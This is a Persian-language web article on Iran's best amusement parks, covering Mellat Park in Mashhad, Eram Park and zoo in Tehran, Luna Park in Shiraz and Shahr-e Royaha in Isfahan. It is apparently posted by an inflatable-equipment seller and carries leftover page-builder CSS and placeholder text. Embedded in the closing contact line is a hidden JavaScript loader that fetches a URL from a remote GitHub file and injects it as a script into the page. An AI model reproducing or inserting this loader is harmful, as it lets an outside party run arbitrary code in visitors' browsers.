بهترین شهربازی های ایران
بهترین شهربازی های ایران

بهترین شهربازی های ایران

  • بهترین شهربازی های ایران؛ در این مطلب می توانید لیستی از بهترین شهربازی های ایران را دریافت کنید! هر بازی ها همانقدر که برای کودکان هیجان و سرگرمی فراهم می آورند، برای بزرگسالان نیز به همان اندازه سرگرم کننده و خاطره انگیز می باشند

    آشنایی با شهربازی پارک ملت مشهد 

    برای آنهایی که در سفر به مشهد به دنبال هیجان، تفریح و خوشگذرانی هستند شهربازی پارک ملت مشهد یکی از بهترین گزینه هاست. این شهربازی در سال 1351 خورشیدی در قلب بزرگترین بوستان شهر مشهد، پارک ملت ساخته شده است و به عنوان اولین شهربازی مشهد نیز شناخته می شود. مجموعه ای که 30 هزار مترمربع وسعت دارد و بزرگترین چرخ و فلک خاورمیانه را در خود جای داده است. مجموعه شهربازی و سرگرمی پارک ملت به عنوان اولین دارنده گواهی استاندارد تجهیزات شهربازی در کشور نیز شناخته می شود و از نظر تنوع و کیفیت در میان برترین شهربازی های ایران قرار گرفته است. این مجموعه هیجانی و تفریحی یکی از بهترین شهربازی های ایران، محیط مناسبی برای بازی و تفریح افراد مختلف اعم از کودکان و بزرگسالان فراهم کرده و خانواده و دوستان در کنار هم می توانند اوقات خوشی برای خود رقم بزنند.
    بهترین شهربازی های ایران
    پارک ملت مشهد

    بخش های مختلف شهربازی پارک ملت مشهد

    بازی ها و تفریحات شهربازی پارک ملت مشهد به 3 قسمت تقسیم می شوند؛ بازی های هیجانی،‌ خانوادگی و کودکان. در این قسمت به معرفی بازی های هیجانی می پردازیم و در ادامه مطلب، بازی های خانوادگی و کودکان مجموعه را کامل معرفی می کنیم.

    بازی های این شهر بازی

      • ماشین برقی
      • کشتی صبا
      • گردباد
      • صندلی فضایی
      • سورتمه
      • کشتی دوبل
      • اسکیت بورد
      • پرواز در آسمان | اسکای فلایر
      • آکروجت فضایی
      • ترن هوایی
      • تاب گردان جایروسوئینگ
      • تاپ اسپین

    فانفار | چرخ و فلک مشهد

    مشهورترین بازی و سرگرمی پارک ملت مشهد چرخ و فلک (فانفار) است که با 82 متر ارتفاع یکی از بزرگترین چرخ و فلک های خاورمیانه به حساب می آید.این وسیله سال 1384 به مجموعه اضافه شد و در هر دور با سرعت 10 کیلومتر بر ساعت، 450 نفر را به ارتفاع 82 متری می برد. ظرفیت دستگاه: 450 نفر مدت:‌ 12 دقیقه
    بهترین شهربازی های ایران
    /*! elementor – v3.14.0 – 26-06-2023 */
    .elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps .elementor-custom-embed{line-height:0}.elementor-widget-google_maps iframe{height:300px} برای تغییر این متن بر روی دکمه ویرایش کلیک کنید. لورم ایپسوم متن ساختگی با تولید سادگی نامفهوم از صنعت چاپ و با استفاده از طراحان گرافیک است.

    شهربازی ارم تهران

    اگر از روزمرگی و یکنواختی زندگیتان خسته شده اید و به دنبال مکانی برای انجام تفریحات هیجان انگیز و شاد به همراه خانواده یا دوستانتان می گردید، پارک ارم تهران پیشنهاد خوبی برایتان خواهد بود. در مجموعه تفریحی ورزشی شهر بازی ارم حس هیجان، ترس و لذت را با هم تجربه خواهید کرد. با الی گشت همراه شوید تا سری به شهر بازی ارم تهران و البته باغ وحش آن بزنیم و با محبوب ترین وسایل بازی و امکانات مجموعه آشنا شویم.
    بهترین شهربازی های ایران
    تهران پر است از باغ ها و پارک های سرسبز و خرم، ولی پارک ارم با دیگر پارک های تهران کلی فرق دارد. مردم برای پیکنیک و لذت بردن از هوای تازه به این پارک سر نمی زنند. بلکه برای تجربه هیجان انگیز ترین و شاید ترسناک ترین فعالیت های عمرشان به این مکان می آیند. در اینجا هم باغ وحش وجود دارد، هم فضای سبز و هم شهربازی و کلی تجهیزات تفریحی که منتظر شما هستند. بنابراین چه بخواهید با خانواده و فرزندانتان به این پارک بروید و چه با دوستانتان، این پارک مکان تفریحی مناسبی برایتان خواهد بود. در ادامه ماجراجویی خود را در مجموعه پارک ارم تهران ادامه می دهیم.

    معرفی مجموعه تفریحی ورزشی و شهر بازی پارک ارم تهران که یکی بهترین شهربازی های ایران

    مجموعه تفریحی ورزشی پارک ارم تهران، در ۴ کیلومتری اتوبان تهران – کرج واقع شده و بیش از ۴ دهه است که میزبان گردشگران و بازدیدکنندگان شهر تهران است. پارک ارم با وسعتی بالغ بر ۷۵ هکتار، به عنوان بزرگترین پارک تفریحی کشور شناخته می شود. این مجموعه از یک باغ وحش و سه شهربازی تشکیل شده است. باغ وحش این مجموعه، با دارا بودن بیش از ۱۲۱ گونه جانوری، بزرگترین باغ وحش پایتخت کشور است. سه شهربازی این مجموعه نیز با حدود ۷۴ دستگاه قدیمی و جدید، از بزرگترین شهربازی های کشور به شمار می روند. برای آشنایی با ترسناک ترین شهربازی های دنیا این مطلب را ببینید. بهترین شهربازی های ایران
    دریاچه بزرگ و منحصر به فرد قایقرانی و ماهیگیری با بیش از ۹ هکتار مساحت، تالارهای پذیرایی کشتی، استخر شنای تابستانی ویژه بانوان، فضاهای سبز و جنگلی، سالن سرپوشیده بازی با بیش از ۱۱۰ بازی، پارکینگ و غرفه های فروش خوراکی و مواد غذایی از جمله دیگر بخش ها و امکانات موجود در پارک ارم تهران هستند. پارک ارم یکی از بهترین شهربازی های ایران که در سال ۱۳۵۰ و توسط فردی به نام رحیم علی خرم تاسیس شد. به همین دلیل قبل از انقلاب به این مجموعه، پارک خرم می گفتند. پس از انقلاب اسلامی نیز این مجموعه رونق خوبی داشته و اخیرا وسایل و تجهیزات جدیدی به آن اضافه شده است. بخش های اصلی پارک ارم، باغ وحش ارم، شهربازی ۱، شهربازی ۲ و شهربازی ۳ هستند که در ادامه هر کدام را معرفی خواهیم کرد. بهترین شهربازی های ایران

    باغ وحش ارم و تنوع حیوانات

    مجموعه بزرگ باغ وحش ارم در ضلع جنوبی این پارک قرار دارد. این باغ وحش در زمینی به مساحت حدودا ۵ هکتار ایجاد شده و امروزه حدود ۱۳۰ گونه جانوری بومی و غیر بومی در آن نگه داری می شود. این باغ وحش در سال ۱۳۷۱ به مجموعه ارم اضافه شد. هدف از تاسیس باغ وحش ارم، آشنایی عموم مردم با حیات وحش و ایجاد محیطی پویا برای انجام تحقیقات در این زمینه عنوان شده است. انواع میمون، شیرهای آفریقایی، ببر سیبری، پلنگ، یوزپلنگ و … از جمله حیوانات موجود در این مکان هستند. اگر به دنیای حیات وحش علاقه دارید، یا دوست دارید فرزند خودتان را با حیوانات اهلی و وحشی آشنا کنید، بازدید این باغ وحش را در برنامه های آخر هفته خود بگنجانید. لازم به ذکر است که ورود به باغ وحش برای کودکان زیر ۵ سال رایگان است. از سال ۱۳۹۲ تغییرات اساسی در باغ وحش ارم صورت گرفته و بیش از ۸۰ درصد جایگاه های نگهداری از حیوانات تغییر کرده است. در حال حاضر این حیوانات نمادهای حفاظتی باغ وحش تهران هستند:
      • گور ایرانی و گوزن زرد ایرانی
      • پلنگ های ایرانی
      • شترهای دو کوهان
      • ببر بنگال سفید
      • فیل های سریلانکایی
      • ۱۶ میرکت یا دم عصایی
      • بهترین شهربازی های ایران

    نام وسایل بازی پارک ارم ۱

    شهر بازی پارک ارم تهران یکی از بهترین شهربازی های ایران، بیشتر فضایی برای تفریح و بازی کودکان است. وسایل سرگرمی این مجموعه تنوع گسترده ای دارند. نمازخانه و سرویس های بهداشتی از دیگر امکانات این بخش از پارک ارم هستند. پارک ارم ۱ در انتهای غربی پارک قرار گرفته و حواستان باشد از پارکینگ باغ وحش یا شهر بازی شماره دو تا اینجا پیاده حدود یک ربع راه است. داخل محوطه انواع مغازه های فروش تنقلات و فست فود مشغول کسب و کار خودشان هستند و در روزهایی تابستانی همیشه عده ای برای پیک نیم روی چمن های محوطه مشغول خوردن ساندویچ یا جوجه کبابند. اگر می خواهید با بهترین جا برای پیک نیک اطراف تهران آشنای شوید، نگاهی به این مطلب بیاندازید. یکی از وسایل جدید پارک ارم در این بخش ستاره گردان است که در آلمان تولید شد و سال ۱۳۹۵ در شهربازی ارم تهران نصب گردید. سالتو (چهار صندلی که شما را بی نهایت بار سر و ته کرده و می چرخانند) از دیگر وسایلی است که صف طولانی برای سوار شدنش تشکیل می شود. یوفو (بشقاب گردان که بر روی ریل یو شکل با دهانه باز) بالا و پایین می رود نیز معمولا مورد استقبال بازدید کنندگان قرار می گیرد. فریزبی پارک ارم که فرصتی برای تجربه ترس و هیجان و خالی کردن انرژی است را هم می توانید همینجا سوار شوید. از جمله دیگر وسایل این مجموعه می توان رالی کودک، قوی گردان، تاب کودک، یوروبانجی، جامپینگ، اسب گردان، اسکیت هوایی، کشتی صبا، فریز بی کودکان، سفینه، تونل وحشت، ترن هوایی کودک، استخر توپ، سورتمه، ماشین تصادفی کودکان و بزرگسالان، تله سیژ، آبشار، مینی جت، کریزی دنس، سرسره بادی و تاب زنجیری بزگسالان را نام برد. بخش بازی های کامپیوتری شهربازی ارم تهران که شامل ۱۵ دستگاه مختلف است نیز در ارم ۱ قرار دارد. بهترین شهربازی های ایران

    شهر بازی ۲ ارم جایی که هیجان به اوج می رسد – بهترین شهربازی های ایران

    در شهر بازی شماره ۲، امکانات کمی متفاوت می شوند. این جا هیجان بیشتری را تجربه می کنید. برای رسیدن به آن باید پس از ورود به سمت راست بپیچید و از در باغ وحش هم بالاتر بروید تا به پارک برسید.  در این بخش هم امکانات رفاهی و تفریحی متعددی فراهم شده و البته فضای سبز آن کمی بیشتر است. از جمله پر طرفدارترین وسایل بازی پارک ارم ۲ دیسک و کاستر (بشقابی گرد که دور تا دورش می نشینند و روی ریلی W شکل حرکت می کند، کاترپیلار (صندلی هایی دو نفره که روی محیط دایره ای می چرخند و شما را به بالا پرتاب می کنند)، بوستر پارک ارم (جفت صندلی هایی که تا ارتفاع زیادی بالا می روند و با سرعت کمی میچرخند) و مهیج تر از همه سقوط آزاد (که شما را آهسته آهسته تا جایی که شهر زیرپایتان بالا می برد و آرام میچرخاند تا لحظه ای نامشخص از آن جا به طرف زمین رها شوید) هستند. چرخ و فلک، سفینه، ماشین برقی بزرگ، قطار شادی، کشتی امیر، قوی گردان، استخر توپ، فریزبی کودک، مونوریل، سینما ۴ بعدی، موتور پرشی، پارا تاور، مجموعه بازی های کامپیوتری، بوستر، رالی آسفالتی، عینک سه بعدی، موتور کودکان و اسب گردان از جمله دیگر تجهیزات و تفریحاتی هستند که در شهر بازی شماره ۲ می توانید انجام دهید.

    کوچک ترین بخش، شهر بازی ۳ ارم

    کریزی موس، تاب پرنده، اسکیت یو، مجموعه پیست کارتینگ، آبشار، ترن هوایی خانواده، عینک سه بعدی و آبشار از وسایل موجود در این بخش هستند. شهر بازی ۳ پارک ارم کنار ارم ۲ است و فاصله زیادی میانشان نیست. جدیدترین و هیجان انگیزترین مورد از دستگاه های شهر بازی ارم در این بخش اسکیت یو است. صندلی های به سمت خارجی محیط دایره که روی ریلی یو شکل آرام آرام بالا می رود و از بالا ترین نقطه آن رها می شود و شما را در شکل یو تاب می دهد. البته این سه بخش در مجموعه پارک ارم تهران از هم تفکیک نشده اند و شما با ورود به مجموعه ارم، در واقع به هر سه بخش پای می گذارید. کافیست بسته به افرادی که با آن ها به این مکان آمده اید (خانواده، فرزندان کودک، دوستان) وسیله و نوع تفریح خود را انتخاب کنید و از آن لذت ببرید.
    برای تغییر این متن بر روی دکمه ویرایش کلیک کنید. لورم ایپسوم متن ساختگی با تولید سادگی نامفهوم از صنعت چاپ و با استفاده از طراحان گرافیک است.

    لونا پارک شیراز، یکی از بهترین شهربازی های ایران

    لوناپارک شیراز از جاهای دیدنی این شهر است که در ناحیه شمالی آن و در نزدیکی به دروازه قرآن، یکی از اصلی‌ترین نمادهای شهر شیراز واقع شده است. لونا پارک جاذبه‌ای زیبا و خوش‌آب‌وهوا، واقع در بخش کوهستانی شیراز است. به همین دلیل موقعیت جغرافیایی این پارک از امتیازات اصلی آن محسوب می‌شود. علاوه بر جذابیت طبیعی و جغرافیایی، این پارک را می‌توان در فهرست مهیج‌ترین جاهای دیدنی شیراز گنجاند و این جاذبه از گزینه‌های تفریحی برای مسافران و ساکنان شهر محسوب می‌شود. تقریبا سی سال از عمر از لونا پارک شیراز می‌گذرد و هنوز این پارک پاتوق جوانان و نوجوانان شیفته‌ آدرنالین و همچنین دیگر گروه‌های سنی دوستدار طبیعت محسوب می‌شود.
    بهترین شهربازی های ایران
    لوناپارک شیراز از اولین پارک‌های میزبان تجهیزات بازی‌های مهیج و پیشرفته خارجی بوده است و بسیاری از شیرازی‌ها یا مسافران، استفاده از وسایل بازی هیجان‌انگیز را برای اولین بار در شهربازی پارک شیراز تجربه کرده‌‌اند. پیش‌قدم‌شدن لونا پارک در نصب دستگاه‌های مهیج تفریحی در ایران، سبب شد تا نام آن بر سر زبان‌ها بیفتد و به سرعت در بین مردم، به‌خصوص جوانان، مشهور و محبوب شود. تجهیزات بازی لونا پارک شیراز شامل انواع وسایل مهیج و پرآدرنالین مخصوص جوانان و نوجوانان است. همچنین برای کودکان نیز بازی‌های کم‌خطرتری همچون قلعه بادی تعبیه شده است تا تمام اعضای خانواده بتوانند در این مجموعه حس خوبی داشته باشند. تنوع امکانات لونا پارک به این موارد محدود نمی‌شود و در این مجموعه بخشی سرپوشیده برای بانوان طراحی شده است تا بتوانند با راحتی دل‌چسبی از امکانات تفریحی و رفاهی پارک لذت ببرند

    انواع وسایل بازی در شهربازی شیراز که یکی بهترین شهربازی های ایران

    لوناپارک نیز مثل دیگر شهربازی‌های بزرگ و معروف که یکی از بهترین شهربازی های ایران، سرزمینی از هیجان و شادی محسوب می‌شود و بسیاری از تجهیزات متنوع را در این مجموعه می‌توان تجربه کرد. این مکان تفریحی شیراز از اولین شهربازی‌های ایران در مجهزشدن به وسایل بازی بوده و برای بسیاری از جوانان و کودکان دیروز، جاذبه‌ای نوستالژیک است. تنوع وسایل بازی در لوناپارک برای گروه‌های سنی مختلف کودک و نوجوان و بزرگ‌سال وجود دارد و برای هر شخص در هر سنی تجربه‌‌ای فراموش‌نشدنی خواهد بود. در ادامه با انواع تجهیزات مهیج این شهربازی آشنا خواهیم شد.

    چرخ‌وفلک

    لوناپارک شیراز به چرخ‌وفلک بلندقامتش معروف است و کمتر مسافری است که در طول سفر به شهر ناز و طرب شیراز، این چرخ‌وفلک خوش‌قدوقامت را در موقعیت کوهستانی لونا پارک تجربه نکرده باشد. از جذابیت‌های این بازی محبوب، تماشای لذت‌بخش منظره‌ای مشرف به تمام شهر است.

    پینت‌بال از بازی‌های جذاب در بسیاری از شهربازی‌هاست و این تفریح دل‌چسب در لونا پارک شیراز نیز برقرار است. پینت‌بال جنگی میان دو تیم با اسلحه‌هایی پرشده از توپ‌های حاوی رنگ است که سراسر آن با آدرنالین دست‌وپنجه نرم خواهید کرد و لذتی بسیار خواهید برد. در این مبارزه پر از هیجان، باید همچون سربازان جنگی، لباسی مخصوص با کلاه‌خود بپوشید و اسلحه‌ای برای حمله و دفاع در دستتان باشد. لیزر تگ، همان پینت بال است، با این تفاوت که اسلحه شما به‌جای توپ‌های حاوی رنگ، با لیزر به هدف شلیک می‌کند. این بازی محدودیت سنی دارد و برای افراد بالای ۱۲ سال مناسب است. از مزایای این بازی نسبت به پینت بال، بدون برخورد فیزیکی گلوله به بدن افراد است. در نتیجه در این بازی خبری از حس دردناک گلوله‌های حاوی رنگ نیست و بازی در آرامش بیشتری پیش می‌رود.

    همان‌طور که گفتیم، شهربازی لوناپارک که یکی از بهترین شهربازی های ایران برای سرگرمی هر گروه سنی، ایده‌ای مهیج دارد و تمام اعضای خانواده در این مجموعه لذت خواهند برد. در این بوستان فضایی بادی مخصوص کودکان خردسال تعبیه شده که شامل چهار قلعه بادی است. این قلعه با طراحی و زیبایی مختص کودکان، فرزند شما را ساعت‌ها سرگرم خواهند کرد.

    حریم وحشت

    اگر بخواهیم در میان امکانات تفرحی شهربازی لونا شیراز، مهیج‌ترین آن‌ها را انتخاب کنیم، انتخاب بسیاری از افراد حریم وحشت خواهد بود. حریم وحشت شهربازی شیراز متشکل از سالن‌ها و دالان‌های مخوف و پررمزوراز است که با هنر طراحی، آدرنالین خونتان را بالا می‌برد و لحظه‌هایی پر از ترس و هیجان برایتان خلق می‌کند. استفاده از این بازی به‌صورت گروهی است و فرصت خوبی است تا میزان شجاعت خودتان را بسنجید.

    تعدادی از بازی‌های هیجان‌انگیز در لونا پارک شیراز؛ یکی از بهترین شهربازی های ایران

    در شهربازی لونا پارک شیراز می‌توانید انواع بازی‌های مهیج و پر از آدرنالین را تجربه کنید. چرخش فضایی، صندلی پرنده، دراگون، رنجر، بشقاب‌پرنده، قطار داخل تونل، آکروجت و… از تجهیزات هیجان‌انگیز لونا پارک محسوب می‌شود.

    بازی‌های تکان‌دهنده

    بازی‌های تکان‌دهنده از دیگر گروه وسایل بازی در بوستان است که در بین آن‌ها می‌توان به الاکلنگ، دایناسور، موتور پلیس، تانک، میمون گردون، ماشین مسابقه و… اشاره کرد.

    شهربازی رویاها اصفهان یکی از بهترین شهربازی های ایران

      • بزرگترین شهربازی ایران است.
      • مهم‌ترین مرکز تفریحی اصفهان به شمار می‌رود.
      • یکی از جاذبه‌ های اصفهان است که هم برای کودکان و هم برای بزرگسالان جذابیت دارد.
      • دو بخش سرپوشیده و باز دارد و امکان استفاده در تمام فصول را در اختیار شما می‌گذارد.
      • 3 سینمای چند بعدی با امکانات و افکت‌های خارق‌العاده دارد که در خاورمیانه بی‌نظیراند.
      • مجموعه‌ای متنوع از بازی‌های هیجان‌انگیز را در خود جای داده است.

    آشنایی با شهر رویاهای اصفهان

    شهر رویاها، عنوان یک مرکز تفریحی 170000 متر مربعی در شرق اصفهان است که به‌عنوان بزرگترین مرکز تفریحی کشور شناخته می‌شود. در این مجموعه جاذبه‌های متنوع تفریحی در دو فضای باز و سرپوشیده قرار گرفته‌اند و می‌توانند افراد را در هر رده سنی و با هر سلیقه‌ای و در چهارفصل سال سرگرم کنند. همین ویژگی به‌همراه استفاده از مدرن‌ترین و پیشرفته‌ترین تجهیزات روز دنیا، این مجموعه را به مکانی مناسب برای یک گردش خانوادگی و گروهی تبدیل کرده است و می‌تواند همه را راضی به خانه بازگرداند. بد نیست بدانید شهر رویاها با مشارکت شرکت High-technology چین ساخته شده و نام بین المللی آن Isfahan Fantawild Adventure است. ساخت این شهربازی در سال ۱۳۸۸ آغاز شد و با ۶۰ میلیارد تومان هزینه در سال ۱۳۹۳ مورد بهره‌برداری قرار گرفت. قرار است در کنار این مجموعه فضاهای تجاری، ورزشی، اقامتی و … نیز ایجاد شود و مجموعه‌ای همه‌چیز‌تمام در منطقه به وجود آید.
    بهترین شهربازی های ایران

    بخش های مختلف شهر رویاها

    شهربازی شهر رویاها که یکی از بهترین شهربازی های ایران دارای چندین بخش مدرن با موضوعات مختلف و بیش از 90 جاذبه متنوع است که عبارت‌اند از:

    فضای ( بهترین شهربازی های ایران )

    محدوده روباز این شهربازی شامل بازی‌های هیجانی برای کودکان و بزرگسالان می‌شود:
      • کاروسل (اسب گردان)
      • ترن هوایی معلق  (جذاب‌ترین بازی فضای باز است؛ حتما آن را امتحان کنید).
      • ترن هوایی کوچک
      • رالی کودک
      • موتور فضایی
      •  زنبور کوچولو
      •  تاب زنجیری
      •  کرم کوچولو
      •  بازوی چرخان
      • سقوط آزاد

    فضای سرپوشیده

    فضای سرپوشیده شهر رویاهایکی از بهترین شهربازی های ایران، پنج بخش مختلف دارد: سالن بازی‌های کامپیوتری سالنی با 8 بخش و ۷۰ دستگاه برای انجام بازی‌های کامپیوتری ورزشی، هیجانی، ماجراجویی، جنگی و … که ظرفیت آن به 300 نفر می‌رسد.

    استودیو جلوه‌های ویژه

    این استودیو، دو سالن با ظرفیت 300 نفر دارد که دو بخش پیش‌نمایش و نمایش اصلی را در خود جای داده است. در ابتدای ورود به اینجا به اتاق پیش‌نمایش می‌روید؛ در بخش نمایش اصلی، فیلم‌ها در سبک‌های مختلف مصری، غربی، قلعه‌‌های باستانی و شهرهای مدرن به نمایش در می‌آیند. ترکیب جلوه‌های ویژه و صحنه‌های واقعی، باعث می‌شود تا در این سالن، 30 دقیقه هیجان‌انگیز و به یادماندنی را تجربه کنید.
    بهترین شهربازی های ایران
    سینما رویا | 3 ماجرای هیجانی آنچه این شهربازی را از نمونه‌های مشابه‌اش، متمایز می‌کند وجود سینما رویا در آن است که 3 فرصت هیجان‌انگیز را به علاقه‌مندان ارائه می‌دهد. این مجموعه‌ها تاکنون در کشورهای چین، آلمان و آمریکا ساخته شده‌اند و شهر رویاها با برخورداری از آن‌ها، در سطح خاورمیانه نظیر ندارد: دنیای زیرآب در این ساختمان صدفی‌شکل، 6 پروژکتور قدرتمند سه‌بعدی و پرده فراگیر محیطی وجود دارد. در اینجا با چشم مسلح و به کمک تصاویر، افکت‌های هوا، صدا، نور، دو ربات جالب میگو و خرچنگ و حرکت همراه با کارهای حجمی، یک نمایش بی‌نظیر ببینید و هیجان دنیای زیر آب را تجربه کنید. سانس این سینما 1 ساعته و ظرفیت آن 300 نفر است.
    شهر واژگون  یکی از چیزهایی که در شهر رویاها توجه را به‌خود جلب می‌کند، ساختمانی با ظاهر واژگون است. در این ساختمان وارد دنیای داستان حمله دایناسورها به شهر می‌شوید و سوار بر واگن‌ها به قلب یک قصه جذاب می‌روید. عینک‌ها، حرکت‌های شناور، صدا، نور، تصویر و فضاهای حجمی، این تجربه هیجان‌انگیز را برایتان به ارمغان می‌آورند. واگن‌ها در یک فضای چند بعدی پیش می‌روند و در طول مسیر ۱۹ افکت برای شما در نظر گرفته شده است. این ساختمان دو سالن انتظار نیز دارد که در آن‌ها اختراعات علمی دانش‌بنیان و آثار علمی جذاب به نمایش در می‌آید. آینه‌های مقعر و محدب، آینه‌های مقعر صوتی، دستگاه فواره خودکار الجزری (یک فواره اتوماتیک کاملا مکانیکی متعلق به 800 سال پیش)، فوتبال رباتیک، تیراندازی لیزری، سیبل مکانیکی، گهواره نیوتن و … از آثاری‌اند که در اینجا می‌بینید.
    سفر به فضا در اینجا در بدو ورود وارد یک آسانسور می‌شوید و به‌صورت فرضی 12 طبقه به بالا می‌روید. وقتی پیاده شوید، در بخش سفینه فضایی خواهید بود. در 6 دقیقه و 20 ثانیه، طعم یک سفر فضایی هیجان‌انگیز را می‌چشید. این سینما 5 کابین 20 نفره دارد.

    بازی های آبی

    در شهر رویاها، یک ساختمان دو طبقه به بازی‌های آبی اختصاص داده شده است. ۵۴ تفنگ آب‌‌پاش و چندین پمپ خودکار آب در این ساختمان وجود دارد و بازدیدکنندگان همراه با موسیقی و فضایی شاد می‌توانند لحظاتی را با هم بازی کنند. ظرفیت این بخش به 300 نفر می‌رسد. کارتینگ شهر رویا کارتینگ شهر رویاهای اصفهان، جایی است که در آن می‌توانید لحظات هیجان‌انگیزی داشته باشید. این کارتینگ در شهربازی شهر رویاها قرار دارد و به شما امکان می‌دهد تا به‌مدت 5 تا 6 دقیقه در پیست 600 متری دور بزنید و یک رقابت متفاوت برای خود رقم بزنید.

    امکانات شهر رویاها که یکی از بهترین شهربازی های ایران

      • کافه و رستوران
      • نمازخانه
      • سرویس بهداشتی
      • پارکینگ

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است.تماس با ما (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۳ از ۵
    از مجموع ۲ رای

    دیدگاهتان را بنویسید